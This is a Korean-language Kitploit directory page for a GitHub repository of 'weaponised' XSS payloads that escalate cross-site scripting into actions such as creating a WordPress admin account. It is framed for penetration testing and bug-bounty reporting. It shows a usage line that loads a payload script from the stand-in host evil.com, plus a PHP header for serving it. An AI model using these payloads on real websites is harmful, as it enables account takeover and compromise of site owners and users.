Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
weaponised-XSS-payloads — XSS payloads designed to turn alert(1) into P1 | Kitploit
도구/GitHubGitHub/hakluke/weaponised-xss-payloads
Payload GenerationExploitationWeb Application ExploitationWeb SecurityPenetration TestingPayload Development
GitHubhakluke/weaponised-xss-payloads

weaponised-XSS-payloads

XSS payloads designed to turn alert(1) into P1

저장소 보기
1.4k2222년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

무기화된 XSS 페이로드

alert(1)을 P1으로 바꾸도록 설계된 XSS 페이로드

블로그 게시물

이 저장소는 "How to Upgrade Your XSS Bugs from Medium to Critical"이라는 제목의 블로그 게시물과 함께 공개되었습니다. https://medium.com/@hakluke/upgrade-xss-from-medium-to-critical-cb96597b6cc4

이게 뭔가요?

이 저장소에는 인기 있는 CMS 플랫폼에서 피해자 브라우저의 컨텍스트로 민감한 기능을 수행하기 위해 XSS 페이로드에 로드할 수 있는 여러 JavaScript 파일이 포함되어 있습니다. 이를 통해 평범한 XSS 버그를 계정 탈취와 같은 더 심각한 문제로 연결할 수 있습니다.

이것은 실제 보안 영향을 입증하여 침투 테스트 또는 버그 바운티 보고서의 심각도를 높이는 데 완벽합니다.

시간이 날 때마다 페이로드가 천천히 추가되고 있습니다. 앞으로 더 많이 추가될 예정이며, 도움을 주실 수 있다면 풀 리퀘스트를 환영합니다! 무엇을 만들지에 대한 아이디어가 필요하다면 이 저장소의 "issues" 탭을 확인하세요.

사용 방법

이 페이로드를 사용하는 가장 간단한 방법은 어딘가에 호스팅한 다음 XSS 페이로드의 script 태그 src 속성에 로드하는 것입니다:

root@kitploit:~
<script src="http://evil.com/wordpress_create_admin_user.js"></script>

또는 페이로드의 컨텍스트와 길이에 따라 축소, 인코딩한 다음 요청에 직접 포함할 수도 있습니다.

JavaScript 파일을 호스팅하려면 Content-Type을 application/javascript로 설정해야 할 수도 있습니다. PHP로 이를 수행하려면 아래 줄을 페이로드 상단에 추가하고 .php 파일로 저장한 다음 PHP가 활성화된 웹 서버에 호스팅하면 됩니다:

root@kitploit:~
<?php header("Content-Type: application/javascript"); ?>

크레딧

Shift8의 이 기사가 이 저장소를 만들게 된 영감이 되었습니다. 기사의 JS에는 몇 가지 사소한 오타가 있지만 개념은 정확합니다.

도구 다운로드